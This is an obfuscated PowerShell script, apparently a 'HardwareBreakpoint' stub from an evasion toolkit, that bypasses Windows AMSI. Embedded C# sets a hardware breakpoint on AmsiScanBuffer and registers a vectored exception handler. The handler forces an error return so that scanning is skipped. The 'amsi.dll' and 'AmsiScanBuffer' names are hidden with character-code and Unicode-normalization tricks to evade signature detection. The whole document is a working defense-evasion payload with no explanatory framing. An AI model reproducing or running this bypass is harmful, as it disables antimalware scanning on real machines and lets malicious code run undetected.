# Stub: HardwareBreakpoint
$zCp40JWCw_ni = @"
using System;
using System.Runtime.InteropServices;
public class DxwR_1 {
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr GetCurrentThread();
    [DllImport("kernel32")]
    public static extern bool GetThreadContext(IntPtr hThread, ref CONTEXT ctx);
    [DllImport("kernel32")]
    public static extern bool SetThreadContext(IntPtr hThread, ref CONTEXT ctx);
    [DllImport("kernel32")]
    public static extern IntPtr AddVectoredExceptionHandler(uint first, IntPtr handler);
    public delegate long VEH(IntPtr pExceptionInfo);
    [StructLayout(LayoutKind.Sequential)]
    public struct CONTEXT {
        public long P1Home, P2Home, P3Home, P4Home, P5Home, P6Home;
        public uint ContextFlags;
        public uint MxCsr;
        public ushort SegCs, SegDs, SegEs, SegFs, SegGs, SegSs;
        public uint EFlags;
        public ulong Dr0, Dr1, Dr2, Dr3, Dr6, Dr7;
        public ulong Rax, Rcx, Rdx, Rbx, Rsp, Rbp, Rsi, Rdi;
        public ulong R8, R9, R10, R11, R12, R13, R14, R15;
        public ulong Rip;
        [MarshalAs(UnmanagedType.ByValArray, SizeConst = 1232)]
        public byte[] ExtRegs;
    }
    private static IntPtr _target;
    public static void SetTarget(IntPtr addr) { _target = addr; }
    public static long Handler(IntPtr pInfo) {
        var rec = Marshal.ReadIntPtr(pInfo);
        var code = (uint)Marshal.ReadInt32(rec);
        var ctx = Marshal.ReadIntPtr(pInfo, IntPtr.Size);
        if (code == 0x80000004) {
            var rip = Marshal.ReadInt64(ctx, 0xF8);
            if ((ulong)rip == (ulong)_target) {
                Marshal.WriteInt64(ctx, 0x78, 0x80070057);
                var rsp = Marshal.ReadInt64(ctx, 0x98);
                Marshal.WriteInt64(ctx, 0xF8, Marshal.ReadInt64(new IntPtr(rsp)));
                Marshal.WriteInt64(ctx, 0x98, rsp + 8);
                return -1;
            }
        }
        return 0;
    }
}
"@
ADD-tyPe $ZcP40jWcw_NI
$KF5Ieim = [dXwR_1]::LoAdLIBRaRY($(('ämsì'+'.dll').NOrMalIzE([stRING][chaR]((70+9-9))+[chaR](0XA902 -BXOr 0xA96d)+[Char](0xC11d -BXOR 0xc16F)+[cHAr]([byte]0X6D)+[ChAr]([byTE]0x44)) -RePLAcE [StRiNg][CHar]([BYTE]0X5C)+[cHAR](70+42)+[CHaR]([bYTE]0X7b)+[chAr]([byTe]0X4D)+[cHaR]([byte]0X6E)+[cHaR]([BYTE]0X7D)))
$MJbAV0a = [dxwr_1]::gEtPRocADDress($Kf5IEim, $(('ÃmsìS'+'cänBù'+'ffêr').NormAlIzE([String][CHaR](0XE395 -BxOr 0xe3D3)+[CHaR]([ByTe]0X6F)+[CHaR](114*97/97)+[cHAR]([byTe]0X6D)+[cHAr]((68*65/65))) -rEpLAce [sTriNG][ChaR]([Byte]0x5C)+[cHAR](0x40dF -bXOR 0x40af)+[CHAr](0xB921 -bxOr 0XB95A)+[cHAR](0xc7b5 -BXor 0xC7F8)+[cHAR]([ByTe]0X6e)+[ChAR]([ByTe]0x7D)))
[dxwR_1]::SeTtaRgeT($MJbAv0A)
$Tw0QqlEGuVB = [dElEgatE]::CREaTEdelegatE([dXwr_1+vEh],[dXwr_1].gETMEthoD('Handler'))
[DxWR_1]::aDdvECTOredeXCEpTIONHAndLer(1, [sYsTem.RUNtime.iNteROpSErvICes.mARSHaL]::geTFunctiONpOinTERfordelEGate($Tw0qqleguVB))
$HcW4 = NeW-ObjEcT dxWr_1+COnTeXt
$hcW4.COnTExtflAGs = 0x100010
$tCTtnb = [dxWR_1]::GetCuRrENttHreAD()
[Dxwr_1]::GEtthReadCOnTExT($tCtTnB, [ref]$HcW4)
$Hcw4.Dr0 = [UiNt64]$MjBAV0a.ToINT64()
$hCw4.Dr7 = $hCW4.dR7 -bOr 1
[dxwR_1]::sETThReAdConTexT($TCTTnB, [rEf]$HCW4)